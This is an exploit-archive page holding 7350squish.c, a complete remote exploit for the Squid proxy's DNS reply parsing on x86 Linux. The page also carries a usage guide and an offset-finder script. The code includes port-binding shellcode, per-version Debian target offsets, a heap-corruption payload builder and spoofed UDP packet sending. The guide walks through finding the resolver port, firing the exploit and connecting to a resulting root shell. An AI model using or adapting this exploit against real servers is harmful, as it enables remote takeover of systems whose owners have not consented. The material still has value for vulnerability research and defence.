what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

7350squish.c

7350squish.c
Posted Jul 18, 2002
Authored by scut, Lorian | Site team-teso.net

7350squish is a Linux / x86 Squid remote exploit. Tested against Debian Squid_2.3.4-2, squid_2.4.1-1, and squid_2.4.2. This code was abandoned in a honey pot and is published under Fair Use Law 17 U.S.C.A 107

tags | exploit, remote, x86
systems | linux, debian
SHA-256 | c9d3a3dd4dd2f657e576ad62e4b0332e4678ac9a512951acc8c4fe28403a63ef

7350squish.c

Change Mirror Download
/* 7350squish - x86/linux squid remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
*****************************************************************************
* bug found by scut 2001/09/10
* further research by lorian.
* exploit by lorian. (beefed up by scut ;)
*
* squid-2.4.1/lib/rfc1035.c:278:# logic fuckup, buffer overflow
*/

#define VERSION "0.1"

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>

#include <arpa/nameser.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


typedef struct {
char * desc; /* distribution */
unsigned char * shellcode;
unsigned int shellcode_len;

unsigned long int retloc; /* return address location */
unsigned long int retaddr; /* return address */

/* resource data length, must be (n * 0x40) + 2 */
unsigned int rdata_len;

/* bytes in decoded dns domain until the next chunk starts */
unsigned int chunk_start;
} tgt_type;


unsigned char x86_lnx_loop[] = "\xeb\xfe";

/* x86/linux pic portshell shellcode, by lorian / teso
* small mods by scut
*
* you can exchange it as you like, just obey the conditions:
*
* - sliceable on 4 byte boundaries
* - pic in itself (i.e. no jmp/callback tricks, no relative addressing)
* - any bytes allowed (NUL, 0x0a, 0x0d, 0x25, ... everything)
* - should be small (< 128 bytes at least)
*/
unsigned char x86_lnx_portshell[] =
"\x31\xc0" /* xor %eax, %eax */
"\x99" /* cltd */
"\x50" /* push %eax */

"\xfe\xc0" /* inc %al */
"\x89\xc3" /* mov %eax, %ebx */

"\x50" /* push %eax */
"\xfe\xc0" /* inc %al */
"\x50" /* push %eax */

"\x89\xe1" /* mov %esp, %ecx */
"\xb0\x66" /* mov $0x66, %al */

"\xcd\x80" /* int $0x80 */
"\x52" /* push %edx */
"\x90" /* nop */

"\x66\x68\x50\x73" /* pushw $0x7350 */ /* port number */

"\x66\x52" /* push %dx */
"\x89\xe2" /* mov %esp, %edx */

"\x6a\x10" /* push $0x10 */
"\x52" /* push %edx */
"\x50" /* push %eax */

"\x89\xe1" /* mov %esp, %ecx */
"\xfe\xc3" /* inc %bl */

"\x89\xc2" /* mov %eax, %edx */
"\xb0\x66" /* mov $0x66, %al */

"\xcd\x80" /* int $0x80 */
"\x90" /* nop */
"\x90" /* nop */

"\x80\xc3\x02" /* add $0x02, %bl */
"\x90" /* nop */

"\xb0\x66" /* mov $0x66, %al */
"\xcd\x80" /* int $0x80 */

"\x50" /* push %eax */
"\x52" /* push %edx */
"\x89\xe1" /* mov %esp, %ecx */

"\xfe\xc3" /* inc %bl */
"\xb0\x66" /* mov $0x66, %al */

"\xcd\x80" /* int $0x80 */
"\x89\xc3" /* mov %eax, %ebx */

"\x31\xc9" /* xor %ecx, %ecx */
"\xb0\x3f" /* mov $0x3f, %al */

"\xcd\x80" /* int $0x80 */
"\xfe\xc1" /* inc %cl */

"\xb0\x3f" /* mov $0x3f, %al */
"\xcd\x80" /* int $0x80 */

"\xb0\x0b" /* mov $0x0b, %al */
"\x99" /* cltd */
"\x52" /* push %edx */

"\x66\x68\x73\x68" /* pushw $0x6873 */

"\x66\x68\x6e\x2f" /* pushw $0x2f6e */

"\x66\x68\x62\x69" /* pushw $0x6962 */

"\x66\x68\x2f\x2f" /* pushw $0x2f2f */

"\x89\xe3" /* mov %esp, %ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */

"\x89\xe1" /* mov %esp, %ecx */
"\xcd\x80" /* int $0x80 */
"";

#define X86_LNX_PS_PORT_HIGH 22
#define X86_LNX_PS_PORT_LOW 23


tgt_type targets[] = {
{ "DEBUG: crash target", x86_lnx_loop, sizeof (x86_lnx_loop) - 1,
0x55555555, 0x66666666, 0x0182, 288 },

/* XXX: not yet working, fixme
{ "Debian sid - squid_2.3.4-2_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,
0x080ee434, 0x080dcc2f, 0x0182, 288 },
*/

{ "Debian sid - squid_2.4.1-1_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1, 0x080df07c, 0x080f0f90, 0x0182,
288 }, { "Debian sid - squid_2.4.1-2_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,
0x080df07c, 0x080f0f90, 0x0182, 288 },
{ "Debian sid - squid_2.4.1-3_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,
0x080df07c, 0x080f0f90, 0x0182, 288 },
{ "Debian sid - squid_2.4.1-4_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,
0x080df59c, 0x080f14b0, 0x0182, 288 },
{ "Debian sid - squid_2.4.1-5_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,
0x080df4bc, 0x080f13d0, 0x0182, 288 },
{ "Debian sid - squid_2.4.1-6_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,
0x080df4bc, 0x080f2970, 0x0182, 288 },
{ "Debian sid - squid_2.4.2-1_i386.deb",
x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,
0x080df838, 0x080f2cf0, 0x0182, 288 },

{ NULL, 0, 0 },
};

/* how much bytes we have to keep untouched before the first chunk
* do not touch, except you know exactly what you're doing
*/
#define CHUNK_PM 4


/* our prototypes */
int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
void usage (char *progname);


/* raw socket and ip prototypes */
int udp_sendpkt (struct sockaddr_in *sin, int s,
unsigned char *data,
unsigned short int datalen,
unsigned long int saddr, unsigned long int daddr,
unsigned short int sport, unsigned short int dport);
int send_packet (char *nsname, short nsport, char *dest, short port,
char *buf, int size);
unsigned short in_cksum (unsigned short *addr, int len);


void
usage (char *progname)
{
fprintf (stderr, "usage: %s [-t <num>] [-p <p#>] <source> <dest>\n\n",
progname);

fprintf (stderr, "-t num\tchoose target (0 for list)\n"
"-p p#\tport of spawned portshell\n"
"source\tis <source-ip>:<source-port>, of a trusted "
"nameserver\n"
"dest\tis <dest-ip>:<dest-port>, of the squid resolver\n\n");
fprintf (stderr, "note: the squid resolver is bound to some high "
"udp port at startup\n"
" time. you have to catch this port number once (it is "
"a normal DGRAM\n"
" socket). in the default configuration squid only "
"trusts the default\n"
" nameservers, so you have to spoof that, too. in the "
"ideal case you can\n"
" sniff the nameserver squid uses.\n\n");

exit (EXIT_FAILURE);
}


int
main (int argc, char *argv[])
{
int len,
n;
char c;
char buffer[512];

tgt_type * tgt;
int tgt_num = -1;

char srcip[64],
dstip[64];
unsigned short int srcp,
dstp;
unsigned short pnum = 0x7350;


printf ("7350squish - x86/linux squid remote exploit. version "VERSION"\n"
"lorian & scut\n\n");


while ((c = getopt (argc, argv, "t:p:")) != EOF) {
switch (c) {
case 't':
tgt_num = atoi (optarg);
break;
case 'p':
if (sscanf (optarg, "%hu", &pnum) != 1)
usage (argv[0]);

break;
default:
usage (argv[0]);
break;
}
}

x86_lnx_portshell[X86_LNX_PS_PORT_HIGH] = (pnum >> 8) & 0xff;
x86_lnx_portshell[X86_LNX_PS_PORT_LOW] = pnum & 0xff;


if (tgt_num < 0) {
fprintf (stderr, "WARNING: no target selected, using default\n");
tgt_num = 1;
}

if (tgt_num == 0 ||
tgt_num >= (sizeof (targets) / sizeof (tgt_type)))
{
if (tgt_num != 0)
printf ("WARNING: target out of list. giving list\n\n");

printf ("num . description\n");
printf ("----+-------------------------------------------------------\n");

for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
printf ("%3d | %s\n", tgt_num + 1,
targets[tgt_num].desc);

printf (" '\n");

exit (EXIT_SUCCESS);
}

if ((argc - optind) != 2)
usage (argv[0]);

if ((sscanf (argv[optind], "%63[^:]:%hu", srcip, &srcp) != 2) ||
(sscanf (argv[optind + 1], "%63[^:]:%hu", dstip, &dstp) != 2))
{
usage (argv[0]);
}


tgt = &targets[tgt_num - 1];

printf ("TARGET: %s\n", tgt->desc);
printf ("OFFSET: 0x%08lx (retloc) 0x%08lx (retaddr) %u/%u\n",
tgt->retloc, tgt->retaddr, tgt->rdata_len, tgt->chunk_start);
printf ("DIRECT: %s %hu -> %s %hu\n", srcip, srcp, dstip, dstp);
printf ("\n");


len = xp_build (tgt, buffer, sizeof (buffer));
printf ("- build %d byte exploitation buffer\n", len);
printf ("- sending... ");
fflush (stdout);

n = send_packet (srcip, srcp, dstip, dstp,
(unsigned char *) &buffer, len);
if (n == -1) {
printf ("failed. exiting\n");

exit (EXIT_FAILURE);
}

printf ("done.\n");

printf ("\n- try \"telnet %s %hu\" now.\n", dstip, pnum);
printf ("\n");

exit (EXIT_SUCCESS);
}


/* xp_build
*
* build exploitation buffer for target `tgt', into `buf', which is `buf_len'
* bytes long. no boundary checking is done, `buf' must be large enough
*
* return length of constructed packet
*/

int
xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
{
int n;
unsigned char * w; /* walker */
unsigned char * xpb; /* exploitation buffer */
unsigned char * chunk;
HEADER * hdr = (HEADER *) buf;


memset (buf, '\x00', buf_len);

/* setup bogus reply header
*/
hdr->id = 0x7350;
hdr->qr = 1;
hdr->opcode = ns_o_query;
hdr->aa = 1;
hdr->rcode = ns_r_noerror;
hdr->rd = hdr->ra = 1;

hdr->qdcount = htons (0x0001);
hdr->ancount = htons (0x0002);
hdr->nscount = hdr->arcount = htons (0x0000);

w = buf + sizeof (HEADER);

/* bogus NUL query */
*w++ = '\x00';
PUTSHORT (ns_t_a, w); /* type */
PUTSHORT (ns_c_in, w); /* class */

/* and the NUL answer */
*w++ = '\x00';
PUTSHORT (ns_t_a, w); /* type */
PUTSHORT (ns_c_in, w); /* class */
PUTLONG (0x00000537, w); /* ttl */
PUTSHORT (0x182, w); /* TODO: extend */

xpb = w;

/* maximum label length blocks
*/
for (n = tgt->rdata_len / 0x40 ; n > 0 ; --n) {
*w = '\x3f';
w += 0x40;
}

/* write down shellcode and jmp-ahead nops
*/
{
int wlen; /* walking length */
unsigned char * stp; /* store pointer */
unsigned char * scp; /* shellcode pointer */
unsigned char * codestart; /* upper end of stored shellcode */

/* make scp point to the last byte of the shellcode, then
* walk the entire mess backwards, copying and slicing the
* code into 4 byte chunks
*/
scp = tgt->shellcode + tgt->shellcode_len;

stp = xpb + tgt->chunk_start - CHUNK_PM;
wlen = tgt->chunk_start - CHUNK_PM - 1;
wlen %= 0x40;
// wlen = 0x3f;

for ( ; scp > tgt->shellcode ; ) {
int clen;

clen = 4;
if ((scp - tgt->shellcode) < clen)
clen = scp - tgt->shellcode;

memcpy (stp - clen, scp - clen, clen);
stp -= clen;
scp -= clen;
wlen -= clen;

if (wlen < 4) {
memcpy (stp - wlen, "\x90\x90\x90", wlen);
stp -= wlen + 1;

/* jump ahead (over domain length byte)
*/
*--stp = '\x01';
*--stp = '\xeb';

wlen = 0x3f - 2;
}

}
codestart = stp;

/* now, fill the rest with jump-ahead nops
*/
while (stp > xpb) {
for ( ; wlen >= 2 ; wlen -= 2) {
unsigned int dist;

dist = codestart - stp;
if (dist >= 0x80)
dist = 0x7e;

*--stp = (unsigned char) dist;
*--stp = '\xeb';
}

if (wlen == 1) {
*--stp = '\x90';
wlen -= 1;
}

stp -= 1; /* label lenght byte */
wlen = 0x3f;
}
}

n = tgt->rdata_len % 0x40;
if (n != 2) {
fprintf (stderr, "invalid remaining buffer space\n");

exit (EXIT_FAILURE);
}

*w++ = '\xc0'; /* compression marker for last label */
*w++ = '\x0c'; /* directly after HEADER */


/* second answer */
*w++ = '\xc0';
*w++ = '\x1c';
PUTSHORT (ns_t_a, w);
PUTSHORT (ns_c_in, w);
PUTLONG (0x00000537, w);
PUTSHORT (0x0000, w);


/* now to the messy details ;)
* we overflow the buffer the domain is decoded to, hence we need to
* align our dns packet buffer to the decoded buffer (+1). the chunk
* will be at tgt->chunk_start then.
*/
chunk = xpb + 1 + tgt->chunk_start;

/* XXX: wtf do we need this? (fails w/o tho)
*/
chunk[-4] = chunk[-3] = chunk[-2] = chunk[-1] = '\x00';
/* prev_size = NULL */
chunk[0] = chunk[1] = chunk[2] = chunk[3] = '\x00';
/* little endian this_size: 64 bytes with PREV_INUSE set */
chunk[4] = '\x41';
chunk[5] = chunk[6] = chunk[7] = '\x00';

/* ->fd = retloc - 12 */
chunk[8] = (tgt->retloc - 12) & 0xff;
chunk[9] = ((tgt->retloc - 12) >> 8) & 0xff;
chunk[10] = ((tgt->retloc - 12) >> 16) & 0xff;
chunk[11] = ((tgt->retloc - 12) >> 24) & 0xff;

/* ->bk = retaddr, XXX: retaddr[8] to retaddr[11] will be crushed */
chunk[12] = tgt->retaddr & 0xff;
chunk[13] = (tgt->retaddr >> 8) & 0xff;
chunk[14] = (tgt->retaddr >> 16) & 0xff;
chunk[15] = (tgt->retaddr >> 24) & 0xff;

/* create a second fake chunk (prev_size = NULL, this_size = pad) */
chunk += 0x40;
chunk[0] = chunk[1] = chunk[2] = chunk[3] = '\x00';
chunk[4] = '\x48';
chunk[5] = '\x01';
chunk[6] = chunk[7] = '\x00';


return ((int) (w - buf));
}



/* XXX: where is the following stuff ripped from? -sc */

/* Send faked UDP packet. */
int
udp_sendpkt (struct sockaddr_in *sin, int s,
unsigned char *data,
unsigned short int datalen,
unsigned long int saddr, unsigned long int daddr,
unsigned short int sport, unsigned short int dport)
{
struct iphdr ip;
struct udphdr udp;
char packet[8192];

/* Fill in IP header values. */
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons (28 + datalen);
ip.id = 0x7350;
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum ((unsigned short *) &ip, sizeof(ip));

/* Fill in UDP header values. Checksums are unnecassary. */
udp.source = htons (sport);
udp.dest = htons (dport);
udp.len = htons (8 + datalen);
udp.check = (unsigned short) 0;

/* Copy the headers into our character array. */
memcpy (packet, (char *) &ip, sizeof (ip));
memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);

return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen, 0,
(struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}


int
send_packet (char *nsname, short nsport, char *dest, short port, char *buf,
int size)
{
int fd,
socktolen;
struct sockaddr_in sockto;
struct in_addr in,
ns;
=20
fd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW);
if (fd == -1) {
perror ("unable to create raw socket:");

exit (EXIT_FAILURE);
}

socktolen = sizeof (struct sockaddr_in);

inet_aton (dest, &in);
inet_aton (nsname, &ns);
=20
socktolen = sizeof (struct sockaddr_in);
memset (&sockto, 0, socktolen);

sockto.sin_family = AF_INET;
sockto.sin_port = htons (port);
sockto.sin_addr.s_addr = in.s_addr;
=20
return (udp_sendpkt (&sockto, fd, buf, size, ns.s_addr, in.s_addr,
nsport, port));
}


unsigned short
in_cksum (unsigned short *addr, int len)
{
int nleft = len;
int sum = 0;
unsigned short answer = 0;
unsigned short * w = addr;

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}

sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;

return (answer);
}


--k+w/mQv8wyuph6w0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="7350squish.txt"



exploitation
============

Squid uses the same UDP port all the time for its resolver. You have to find
this port number. Also, you need to find the trusted nameserver and its port
(always 53). Some Squids trust every nameserver, but most (default) do only
trust the default nameserver. So you either have to be in the local LAN or be
able to spoof packets from the trusted nameservers address. The UDP port
number is high ephemeral and for most Linux installations, it is somewhere
around (32768 - 32900). The offsets are tight, you will have to get the exact
stuff or brute long. Since you attack the child process of Squid, which gets
restarted on crash, you have unlimited tries. Each try creates two log entries
in the squid logfile.

Exploitation example:
---------------------

192.168.144.6 is the Squid server, 130.149.17.5 the default nameserver it uses
and trusts.

# tcpdump -n src 192.168.144.6 and udp and dst port 53 &
# (echo "HEAD http://test.ts/ HTTP/1.0" ; echo ) | \
nc 192.168.144.6 3128 >/dev/null
18:57:03.070418 192.168.144.6.32819 > 130.149.17.5.53: 9+ A? test.ts. (25) (DF)
^^^^^
We see the sourceport it uses and the trusted nameserver address.

# ./7350squish -t 3 -p 4050 130.149.17.5:53 192.168.144.6:32819 \
2>&1 >/dev/null

After the packet has been send, we need to trigger the resolver a second time
to let it read our packet.

# (echo "HEAD http://test2.ts/ HTTP/1.0" ; echo) | \
nc 192.168.144.6 3128 >/dev/null
# telnet 192.168.144.6 4050
Trying 192.168.144.6...
Connected to 192.168.144.6.
Escape character is '^]'.
id;
uid=0(root) gid=13(proxy) euid=13(proxy) groups=13(proxy)


On some systems, Squid runs as uid=0 (for some strange reason I've to figure
out), debian sid for example.


offsets
=======

retloc:
-------

Any GOT entry that is used often will do fine:

# objdump --dynamic-reloc /usr/sbin/squid | grep memcpy
080df838 R_386_JUMP_SLOT memcpy

retaddr:
--------

There are multiple places we can return to, but this is the most fixed one
(static lower heap buffer).


# ltrace -o out -p `ps auxwww|egrep "\(squid\)"|awk '{print $2}'`

(on another term, use the squid, as in):

# (echo "HEAD http://www.cow.org/ HTTP/1.0";echo) | nc 127.0.0.1 3128

(now abort the ltrace process).

# grep recvfrom out

Will give output like:

1630 recvfrom(5, 0x080f2c60, 512, 0, 0xbfff79bc) = 116
1630 recvfrom(5, 0x080f2c60, 512, 0, 0xbfff79bc) = -1
^^^^^^^^^^

retaddr = 0x080f2c60 + 0x90 = 0x080f2cf0


alignments:
-----------

The default (0x0182, 288) should be just fine. If not, those are more
difficult to get.




--k+w/mQv8wyuph6w0
Content-Type: text/x-sh; charset=us-ascii
Content-Disposition: attachment; filename="offset-find.sh"

#!/bin/sh

# 7350squish offset finder
# lorian & scut

check_util ()
{
for util in $*; do
echo -n "checking for $util: "
if ! which $util; then
echo "not found, aborting"
exit
fi
done
}

echo "7350squish exploit offset finder"
echo

if [ $# != 1 ]; then
echo "usage: $0 /path/to/squid/binary"
echo
exit
fi;


check_util awk objdump

echo

bufferbase=`objdump -D $1 2>/dev/null | \
grep "68 00 02 00 00" -A 1 | tail -1 | cut -d '$' -f2`

retaddr=`echo $bufferbase | awk 'function hex2num(s)
{
n = length (s)
v = 0
for (i = 1; i < n-1; i++) {
c = tolower(substr (s, i+2, 1));
if (c=="a") c=10;
if (c=="b") c=11;
if (c=="c") c=12;
if (c=="d") c=13;
if (c=="e") c=14;
if (c=="f") c=15;
v = v * 16 + c;
}
return v
}
{
printf ("0x%08x\n", hex2num ($0) + 144)
}'`

#retaddr=`echo $bufferbase | awk '{ printf ("0x%08x\n", $0 + 144) }'`

retloc=`objdump -R $1 2>/dev/null | \
grep "memcpy$" | awk '{ printf ("0x%s", $1) }'`

echo "{ \"NEW TARGET\","
echo "x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,"
echo "$retloc, /* GOT: memcpy */"
echo "$retaddr, /* packet receive buffer + 0x90 */"
echo "0x0182, 288 },"
echo

echo finished.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close